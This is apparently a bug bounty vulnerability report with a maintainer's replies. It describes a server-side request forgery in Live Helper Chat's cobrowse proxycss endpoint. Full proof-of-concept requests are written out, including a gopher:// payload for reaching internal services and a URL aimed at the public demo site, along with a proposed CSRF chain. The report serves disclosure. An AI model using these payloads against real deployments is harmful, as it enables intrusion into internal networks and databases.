SSRF on index.php/cobrowse/proxycss/ in livehelperchat/livehelperchat
Reported on
Mar 29th 2022
Description
Live Helper Chat is vulnerable to SSRF on the /index.php/cobrowse/proxycss
endpoint. It's possible to make internal requests and see the response as an authenticated user, it's also possible to make an request with any protocol using goppher://
.
Proof of Concept
- Request
http://127.0.0.1/index.php/cobrowse/proxycss/1?base=gopher://0:80/xGET%20/&css=
GET /index.php/cobrowse/proxycss/1?base=gopher://0:80/xGET%20/&css= HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: lhc_vid=10c9573dc50925e9141f; PHPSESSID=1f91a362084b1d87c4ebdf255fc32629
Connection: close
This could be used chained with the CSRF vulnerability https://huntr.dev/bounties/35ab4644-ff90-4723-ab05-ede4eddf69c6/ to achieve the SSRF without authentication.
Impact
An attacker could make the application perform arbitrary requests.
Provide full steps to reproduce. As this is just a theoretical issue without real impact as all information sensitive URL's is protected via CSRF
Hi Remigijus,
PoC
1 . Login on https://demo.livehelperchat.com/ 2 . Access https://demo.livehelperchat.com/site_admin/cobrowse/proxycss/1?base=http://0&css=
You will see the response of the local Nginx server.
Impact
SSRF are a high impact vulnerability, as an attacker can force the server to send requests. With this SSRF it's possible to access the internal network and cloud infrastructure. Using the gopher://
protocol an attacker can send requests in any protocol, not only HTTP, accessing the local MySQL database for example.
Altho the endpoint is only accessible for authenticated users, using the https://huntr.dev/bounties/35ab4644-ff90-4723-ab05-ede4eddf69c6/ bug an attacker can put the malicious link on the [img]
and the SSRF will trigger when the Admin access the message .
You can read more about SSRF here : https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
I don't see any problem with seeing default nginx webpage. Please provide real world POC
And the one with [img] tag I closed, because your POC is invalid as sensitive information is protected with CSRF.